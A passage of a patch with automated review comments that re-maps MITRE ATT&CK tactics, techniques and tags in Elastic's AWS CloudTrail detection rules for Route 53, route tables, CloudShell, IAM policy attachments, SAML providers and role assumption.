--- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
+++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
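Review bot: In the `@@ -144,29 +144,29 @@` hunk of persistence_rds_instance_made_public.toml the Defense Evasion entry maps T1578 at the technique level with no subtechnique, while the other hunks in this patch that reclassify a configuration change (lambda_backdoor, route_53_hosted_zone_associated_with_a_vpc, route_table_created) all add a T1578.005 `[[rule.threat.technique.subtechnique]]` block. If exposing an RDS instance publicly is the same kind of change, add the T1578.005 block here for consistency; if the top-level mapping is deliberate, a one-line rationale in the PR would keep the next reader from "fixing" it. The new Persistence entry (T1133 External Remote Services) reads as a sensible fit for a database reachable from the internet, and the rule's tags hunk is not in this chunk, so tag/tactic agreement for this file is only checked by the new unit test.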
@@ -104,16 +104,7 @@ references = [
 risk_score = 73
 rule_id = "12051077-0124-4394-9522-8f4f4db1d674"
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Route 53",
- "Use Case: Asset Visibility",
- "Tactic: Persistence",
- "Tactic: Resource Development",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -127,34 +118,34 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1584"
 name = "Compromise Infrastructure"
 reference = "https://attack.mitre.org/techniques/T1584/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1584.001"
 name = "Domains"
 reference = "https://attack.mitre.org/techniques/T1584/001/"
-
-
 [rule.threat.tactic]
 id = "TA0042"
 name = "Resource Development"
 reference = "https://attack.mitre.org/tactics/TA0042/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
index cabac631f4d..fe3fe241355 100644
--- a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
+++ b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -104,16 +104,7 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Opera
 risk_score = 73
 rule_id = "2045567e-b0af-444a-8c0b-0b6e2dae9e13"
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Route 53",
- "Use Case: Asset Visibility",
- "Tactic: Persistence",
- "Tactic: Resource Development",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -127,34 +118,21 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1584"
 name = "Compromise Infrastructure"
 reference = "https://attack.mitre.org/techniques/T1584/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1584.001"
 name = "Domains"
 reference = "https://attack.mitre.org/techniques/T1584/001/"
-
-
 [rule.threat.tactic]
 id = "TA0042"
 name = "Resource Development"
 reference = "https://attack.mitre.org/tactics/TA0042/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
index 6a09be1c590..3b9bf00653d 100644
--- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
+++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/07/19"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer", "Elastic"]
@@ -102,16 +102,7 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Assoc
 risk_score = 47
 rule_id = "e3c27562-709a-42bd-82f2-3ed926cced19"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Route 53",
- "Use Case: Asset Visibility",
- "Tactic: Persistence",
- "Tactic: Resource Development",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -125,34 +116,21 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1583"
-name = "Acquire Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1583/"
-[[rule.threat.technique.subtechnique]]
-id = "T1583.001"
-name = "Domains"
-reference = "https://attack.mitre.org/techniques/T1583/001/"
-
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
 [rule.threat.tactic]
-id = "TA0042"
-name = "Resource Development"
-reference = "https://attack.mitre.org/tactics/TA0042/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml
index fe48343e5ba..1d7f572fb57 100644
--- a/rules/integrations/aws/persistence_route_table_created.toml
+++ b/rules/integrations/aws/persistence_route_table_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -64,15 +64,7 @@ references = [
 risk_score = 21
 rule_id = "e12c0318-99b1-44f2-830c-3a38a43207ca"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EC2",
- "Use Case: Network Security Monitoring",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -106,11 +98,20 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name"]
diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml
index 1ada122b033..51d909014ae 100644
--- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml
+++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -121,39 +121,54 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [[rule.threat.technique]]
 id = "T1136"
 name = "Create Account"
 reference = "https://attack.mitre.org/techniques/T1136/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1136.003"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1136/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml
index fefefd67732..d2efba1a208 100644
--- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml
+++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/10/25"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
@@ -63,17 +63,7 @@ references = [
 risk_score = 21
 rule_id = "a22f566b-5b23-4412-880d-c6c957acd321"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS STS",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Tactic: Persistence",
- "Tactic: Lateral Movement",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -106,49 +96,39 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.006"
-name = "Multi-Factor Authentication"
-reference = "https://attack.mitre.org/techniques/T1556/006/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"]
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
index 7a16cf870c9..5b219d895c2 100644
--- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/31"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -121,39 +121,39 @@ iam where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
index 87734bebf8d..591f18d2a80 100644
--- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/31"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -119,39 +119,39 @@ iam where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
index f694877d86f..066335da0e3 100644
--- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/30"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -123,39 +123,29 @@ iam where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
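Review bot: The `@@ -123,39 +123,29 @@` hunk removes the T1098.003 Additional Cloud Roles subtechnique from both threat entries of the `_user` rule, while the sibling `_group` and `_role` rules in the two preceding file sections keep T1098.003 under both Persistence and Privilege Escalation after their reorder. Judging by the file names all three detect the same AdministratorAccess attachment on a different IAM principal type, so the subtechnique either applies to all three or to none. If the intent is that .003 is about roles specifically and does not fit a user principal, a sentence in the PR description would make that explicit; otherwise restore the two `[[rule.threat.technique.subtechnique]]` blocks here so the three rules stay aligned.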
diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
index 628f3841116..25ef1309ea1 100644
--- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/22"
+updated_date = "2026/03/23"
 min_stack_comments = "New entity classification fields added: entity.target.id"
 min_stack_version = "9.2.0"
@@ -77,15 +77,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRol
 risk_score = 21
 rule_id = "f6d07a70-9ad0-11ef-954f-f661ea17fbcd"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Resources: Investigation Guide",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -100,22 +92,29 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-[[rule.threat.technique.subtechnique]]
-id = "T1548.005"
-name = "Temporary Elevated Cloud Access"
-reference = "https://attack.mitre.org/techniques/T1548/005/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
index 4b9ab1316e7..15745c5cb4d 100644
--- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/09/22"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -102,15 +102,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAM
 risk_score = 47
 rule_id = "979729e7-0c52-4c4c-b71e-88103304a79f"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -125,22 +117,39 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1484"
 name = "Domain or Tenant Policy Modification"
 reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1484.002"
 name = "Trust Modification"
 reference = "https://attack.mitre.org/techniques/T1484/002/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1484.002"
+name = "Trust Modification"
+reference = "https://attack.mitre.org/techniques/T1484/002/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
index bc91f308bb7..8e13ad18bb8 100644
--- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
+++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/06"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/22"
+updated_date = "2026/03/23"
 min_stack_comments = "New entity classification fields added: entity.target.id"
 min_stack_version = "9.2.0"
@@ -75,15 +75,7 @@ references = ["https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in-
 risk_score = 21
 rule_id = "a60326d7-dca7-4fb7-93eb-1ca03a1febbd"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Use Case: Identity and Access Audit",
- "Resources: Investigation Guide",
- "Tactic: Privilege Escalation",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -97,22 +89,39 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml
index c65c86306e6..91424af9073 100644
--- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml
+++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2025/12/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -73,16 +73,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol
 risk_score = 21
 rule_id = "93075852-b0f5-4b8b-89c3-a226efae5726"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS STS",
- "Resources: Investigation Guide",
- "Use Case: Identity and Access Audit",
- "Tactic: Privilege Escalation",
- "Tactic: Lateral Movement",
-]
+tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -109,34 +100,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
